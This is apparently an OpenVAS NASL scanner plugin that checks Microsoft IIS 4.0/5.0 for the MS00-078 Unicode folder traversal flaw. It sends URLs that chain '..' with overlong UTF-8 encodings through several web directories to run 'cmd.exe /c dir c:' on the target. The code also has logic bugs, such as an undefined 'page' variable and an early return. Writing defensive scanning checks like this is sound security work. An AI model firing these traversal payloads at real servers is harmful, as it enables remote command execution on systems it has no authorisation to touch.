# OpenVAS Vulnerability Test
# $Id$
# Description: 
# Microsoft Security Bulletin (MS00-078)
# 'Web Server Folder Traversal' Vulnerability 
# Microsoft IIS Executable File Parsing Vulnerability (MS00-086)
#
# Affected Software: 
# Microsoft Internet Information Server 4.0 
# Microsoft Internet Information Server 5.0 
#
# remote-MS00-078.nasl
#
# Author:
# Christian Eric Edjenguele <christian.edjenguele@owasp.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 or later,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#



if(description)
{
script_id(101014);
script_cve_id("CVE-2000-0884");
script_bugtraq_id(1806);
name["english"] = "Microsoft MS00-078 security check";
script_name(english:name["english"]);
 
desc["english"] = "

Microsoft IIS 4.0 and 5.0 are affected by a web server trasversal vulnerability.
This vulnerability could potentially allow a visitor to a web site to take a wide range of destructive actions against it, 
including running programs on it. 

Solution : 

There is not a new patch for this vulnerability. Instead, it is eliminated by the patch that accompanied Microsoft Security Bulletin MS00-057.
Download locations for this patch 

Microsoft IIS 4.0:
http://support.microsoft.com/kb/269862/en-us 
 
Microsoft IIS 5.0:
http://technet.microsoft.com/windowsserver/2000/default.aspx 

 



Risk factor: high";


script_description(english:desc["english"]);
 
summary["english"] = "Microsoft IIS 4.0 and 5.0 are prone to web server trasversal vulnerabilities";
 
script_summary(english:summary["english"]);
 
script_category(ACT_ATTACK);
 
script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele@owasp.org> and released under GPL v2 or later");
family["english"] = "Windows : Microsoft Bulletins";
script_family(english:family["english"]);
script_require_ports("Services/www");
 
exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

iis = get_kb_list("Services/www");


# remote command to run
r_cmd = '/winnt/system32/cmd.exe?/c+dir+c:';

d = make_list('/scripts/', 
	'/msadc/', 
	'/iisadmpwd/', 
	'/_vti_bin/', 
	'/_mem_bin/', 
	'/exchange/', 
	'/pbserver/', 
	'/rpc/', 
	'/cgi-bin/', 
	'/');

uc = make_list('%c0%af',
		'%c0%9v',
		'%c1%c1',
		'%c0%qf',
		'%c1%8s',
		'%c1%9c',
		'%c1%pc',
		'%c1%1c',
                 '%c0%2f',
                 '%e0%80%af');


h_ip = get_host_ip();

foreach port (iis)
{
	soc = open_sock_tcp(port);
	foreach webdir (d)
	{
		foreach uni_code (uc)
		{
			# build the malicious url
			url = strcat(webdir , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , r_cmd);
			
			# build the query, put headers
			qry = string('GET /' + url + ' HTTP/1.0\r\n',
				'Host: ' + h_ip + '\r\n',
				'Connection: Keep-Alive\r\n\r\n');
				
			req = http_get(item:qry, port:port);
			send(socket:soc, data:req);
				
			# get back the response
			reply = recv(socket:soc, length:4096);
			
			if(reply)
				return;
			
		}
	}
		
		req = http_get(item:page, port:port);
		send(socket:soc, data: req);
		
		reply = recv(socket:soc, length:4096);
		close(soc);

		if(reply)
		{
			header_server = egrep(pattern:"Server", string:reply, icase:TRUE);
			if(("Microsoft-IIS" >< header_server ) && (egrep(pattern:"HTTP/1.[01] 200", string:reply)) && (("<dir>" >< reply) ||
			 'directory of' >< reply)) 
			report = 'Exploit String' + url + ' for vulnerability:\n' + reply;
			security_hole(port:port, data:report);
		}
}

